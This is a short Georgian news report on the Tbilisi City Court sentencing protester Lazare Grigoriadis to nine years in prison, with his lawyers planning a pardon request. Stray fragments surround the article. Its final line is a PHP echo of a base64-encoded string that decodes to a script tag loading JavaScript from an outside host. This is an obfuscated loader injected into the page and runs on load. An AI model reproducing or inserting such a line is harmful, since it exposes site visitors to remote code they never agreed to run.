celsiusi
ავერსი საქკაბელი

თბილისის საქალაქო სასამართლომ ლაზარე გრიგორიადისის საქმეზე გადაწყვეტილება გამოაცხადა. მოსამართლის გადაწყვეტილებით, გრიგორიადისს 9 წლით თავისუფლების აღკვეთა მიესაჯა.

სხდომის დასრულების შემდეგ დაცვის მხარემ თქვა, რომ ისინი ელოდნენ ამ განაჩენს. ადვოკატები ლაზარე გრიგორიადისის შეწყალების მოთხოვნით პრეზიდენტს მიმართავენ.

22 წლის ლაზარე გრიგორიადისი პოლიციამ 2023 წლის 29 მარტის ღამით აქციაზე დააკავა. მას რუსული კანონის წინააღმდეგ პარლამენტთან გამართულ აქციებზე პოლიციელთა მიმართ ძალადობასა და შსს-ს კუთვნილ ავტომობილზე ცეცხლის წაკიდებას ედავებიან. ბრალი 7-დან 11 წლამდე პატიმრობას ითვალისწინებდა.

თბილისის საქალაქო სასამართლოში ლაზარე გრიგორიადისის საქმის განხილვა 2023 წლის 18 მაისს დაიწყო. დაცვის მხარე პროცესის განგებ გაჭიანურებაზე მიუთითებდა. პროცესის განმავლობაში სხდომა არაერთხელ გადაიდო.

192
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");